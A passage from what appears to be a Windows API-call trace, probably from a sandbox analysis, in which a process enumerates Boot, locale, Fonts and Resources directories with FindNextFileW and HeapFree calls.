dwReserved0=0x0, dwReserved1=0x240000, cFileName="1055", cAlternateFileName="")) returned 1 [0171.368] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0171.368] FindNextFileW (in: hFindFile=0x802398, lpFindFileData=0x391fa7c | out: lpFindFileData=0x391fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="2052", cAlternateFileName="")) returned 1 [0171.368] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0171.368] FindNextFileW (in: hFindFile=0x802398, lpFindFileData=0x391fa7c | out: lpFindFileData=0x391fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="2070", cAlternateFileName="")) returned 1 [0171.369] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0171.369] FindNextFileW (in: hFindFile=0x802398, lpFindFileData=0x391fa7c | out: lpFindFileData=0x391fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="3076", cAlternateFileName="")) returned 1 [0171.369] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0171.369] FindNextFileW (in: hFindFile=0x802398, lpFindFileData=0x391fa7c | out: lpFindFileData=0x391fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="3082", cAlternateFileName="")) returned 1 [0171.369] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0171.369] FindNextFileW (in: hFindFile=0x802398, lpFindFileData=0x391fa7c | out: lpFindFileData=0x391fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf3768b28, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Client", cAlternateFileName="")) returned 1 [0171.369] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0171.369] FindNextFileW (in: hFindFile=0x802398, lpFindFileData=0x391fa7c | out: lpFindFileData=0x391fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbc518d00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbc518d00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbc518d00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x3ef6, dwReserved0=0x0, dwReserved1=0x240000, cFileName="DHtmlHeader.html", cAlternateFileName="DHTMLH~1.HTM")) returned 1 [0171.370] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0171.370] FindNextFileW (in: hFindFile=0x802398, lpFindFileData=0x391fa7c | out: lpFindFileData=0x391fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf36f6419, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf371c69a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf371c69a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Graphics", cAlternateFileName="")) returned 1 [0171.372] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0171.372] FindNextFileW (in: hFindFile=0x802398, lpFindFileData=0x391fa7c | out: lpFindFileData=0x391fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x87910600, ftCreationTime.dwHighDateTime=0x1ca2a27, ftLastAccessTime.dwLowDateTime=0x87910600, ftLastAccessTime.dwHighDateTime=0x1ca2a27, ftLastWriteTime.dwLowDateTime=0x87910600, ftLastWriteTime.dwHighDateTime=0x1ca2a27, nFileSizeHigh=0x0, nFileSizeLow=0xe2c, dwReserved0=0x0, dwReserved1=0x240000, cFileName="header.bmp", cAlternateFileName="")) returned 1 [0171.372] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e80050 | out: hHeap=0x710000) returned 1 [0171.372] FindNextFileW (in: hFindFile=0x8020d8, lpFindFileData=0x391fcf8 | out: lpFindFileData=0x391fcf8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xc47952ba, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6fa258, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef6fa258, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77970000, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0171.373] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0171.373] FindNextFileW (in: hFindFile=0x802398, lpFindFileData=0x391fa7c | out: lpFindFileData=0x391fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef4e6d79, ftCreationTime.dwHighDateTime=0x1d3273d, ftLastAccessTime.dwLowDateTime=0xef4e6d79, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2d79a60, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x175a0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="bootspaces.dll", cAlternateFileName="BOOTSP~1.DLL")) returned 1 [0171.373] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0171.373] FindNextFileW (in: hFindFile=0x802398, lpFindFileData=0x391fa7c | out: lpFindFileData=0x391fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47e189c, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0008dbb, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5252b3, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="da-DK", cAlternateFileName="")) returned 1 [0171.373] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0171.373] FindNextFileW (in: hFindFile=0x802398, lpFindFileData=0x391fa7c | out: lpFindFileData=0x391fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48079da, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0009692, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef538bee, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="de-DE", cAlternateFileName="")) returned 1 [0171.373] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0171.373] FindNextFileW (in: hFindFile=0x802398, lpFindFileData=0x391fa7c | out: lpFindFileData=0x391fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef555ff8, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef555ff8, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="el-GR", cAlternateFileName="")) returned 1 [0171.374] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0171.374] FindNextFileW (in: hFindFile=0x802398, lpFindFileData=0x391fa7c | out: lpFindFileData=0x391fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc482dc87, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc482dc87, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="en-GB", cAlternateFileName="")) returned 1 [0171.374] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0171.374] FindNextFileW (in: hFindFile=0x802398, lpFindFileData=0x391fa7c | out: lpFindFileData=0x391fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef57d0f5, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef57d0f5, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="en-US", cAlternateFileName="")) returned 1 [0171.374] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0171.374] FindNextFileW (in: hFindFile=0x802398, lpFindFileData=0x391fa7c | out: lpFindFileData=0x391fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000b9ad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef586d37, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="es-ES", cAlternateFileName="")) returned 1 [0171.374] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0171.374] FindNextFileW (in: hFindFile=0x802398, lpFindFileData=0x391fa7c | out: lpFindFileData=0x391fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000c12e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xc4853f40, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="es-MX", cAlternateFileName="")) returned 1 [0171.374] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0171.374] FindNextFileW (in: hFindFile=0x802398, lpFindFileData=0x391fa7c | out: lpFindFileData=0x391fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc487a0b9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc487a0b9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="et-EE", cAlternateFileName="")) returned 1 [0171.375] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0171.375] FindNextFileW (in: hFindFile=0x802398, lpFindFileData=0x391fa7c | out: lpFindFileData=0x391fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000cf3a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef59a5b1, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0171.375] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0171.375] FindNextFileW (in: hFindFile=0x802398, lpFindFileData=0x391fa7c | out: lpFindFileData=0x391fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc49ab3c7, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0109451, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef999ae4, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Fonts", cAlternateFileName="")) returned 1 [0171.377] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0171.377] FindNextFileW (in: hFindFile=0x802398, lpFindFileData=0x391fa7c | out: lpFindFileData=0x391fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48a0490, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="fr-CA", cAlternateFileName="")) returned 1 [0171.377] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0171.377] FindNextFileW (in: hFindFile=0x802398, lpFindFileData=0x391fa7c | out: lpFindFileData=0x391fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010bc12, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5ade2b, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0171.377] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0171.377] FindNextFileW (in: hFindFile=0x802398, lpFindFileData=0x391fa7c | out: lpFindFileData=0x391fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48a0490, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="hr-HR", cAlternateFileName="")) returned 1 [0171.377] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0171.377] FindNextFileW (in: hFindFile=0x802398, lpFindFileData=0x391fa7c | out: lpFindFileData=0x391fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010c5ad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5c171b, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0171.377] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0171.377] FindNextFileW (in: hFindFile=0x802398, lpFindFileData=0x391fa7c | out: lpFindFileData=0x391fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010ccad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5d8ab4, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="it-IT", cAlternateFileName="")) returned 1 [0171.378] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0171.378] FindNextFileW (in: hFindFile=0x802398, lpFindFileData=0x391fa7c | out: lpFindFileData=0x391fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48c6596, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010d0c0, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5ed6c6, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0171.378] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0171.378] FindNextFileW (in: hFindFile=0x802398, lpFindFileData=0x391fa7c | out: lpFindFileData=0x391fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48c6596, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5fc210, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef5fc210, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0171.378] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0171.378] FindNextFileW (in: hFindFile=0x802398, lpFindFileData=0x391fa7c | out: lpFindFileData=0x391fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48ec805, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48ec805, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="lt-LT", cAlternateFileName="")) returned 1 [0171.378] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0171.378] FindNextFileW (in: hFindFile=0x802398, lpFindFileData=0x391fa7c | out: lpFindFileData=0x391fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48ec805, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48ec805, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="lv-LV", cAlternateFileName="")) returned 1 [0171.378] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0171.378] FindNextFileW (in: hFindFile=0x802398, lpFindFileData=0x391fa7c | out: lpFindFileData=0x391fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6196d8, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xfbcf473f, ftLastWriteTime.dwHighDateTime=0x1d2fa06, nFileSizeHigh=0x0, nFileSizeLow=0xc63a0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="memtest.exe", cAlternateFileName="")) returned 1 [0171.379] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0171.379] FindNextFileW (in: hFindFile=0x802398, lpFindFileData=0x391fa7c | out: lpFindFileData=0x391fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010e4fa, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6407cf, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0171.379] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0171.379] FindNextFileW (in: hFindFile=0x802398, lpFindFileData=0x391fa7c | out: lpFindFileData=0x391fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef65403a, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef65403a, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0171.379] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0171.379] FindNextFileW (in: hFindFile=0x802398, lpFindFileData=0x391fa7c | out: lpFindFileData=0x391fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6678d6, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef6678d6, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0171.379] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0171.379] FindNextFileW (in: hFindFile=0x802398, lpFindFileData=0x391fa7c | out: lpFindFileData=0x391fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010f167, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6714dc, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0171.379] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0171.379] FindNextFileW (in: hFindFile=0x802398, lpFindFileData=0x391fa7c | out: lpFindFileData=0x391fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010f640, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef684d85, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="qps-ploc", cAlternateFileName="")) returned 1 [0171.380] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0171.380] FindNextFileW (in: hFindFile=0x802398, lpFindFileData=0x391fa7c | out: lpFindFileData=0x391fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa01ab61e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef9abff9, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Resources", cAlternateFileName="RESOUR~1")) returned 1 [0171.380] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ee7268 | out: hHeap=0x710000) returned 1 [0171.380] FindNextFileW (in: hFindFile=0x802558, lpFindFileData=0x391f800 | out: lpFindFileData=0x391f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa01ac01e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef9baa67, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 0 [0171.380] FindClose (in: hFindFile=0x802558 | out: hFindFile=0x802558) returned 1 [0171.380] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0171.380] FindNextFileW (in: hFindFile=0x802398, lpFindFileData=0x391fa7c | out: lpFindFileData=0x391fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc4938cb0, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="ro-RO", cAlternateFileName="")) returned 1 [0171.381] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0171.381] FindNextFileW (in: hFindFile=0x802398, lpFindFileData=0x391fa7c | out: lpFindFileData=0x391fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef698608, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef698608, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="ru-RU", cAlternateFileName="")) returned 1 [0171.381] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0171.381] FindNextFileW (in: hFindFile=0x802398, lpFindFileData=0x391fa7c | out: lpFindFileData=0x391fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc4938cb0, ftLastWriteTime.dwHighDateTime=0x1d32764, 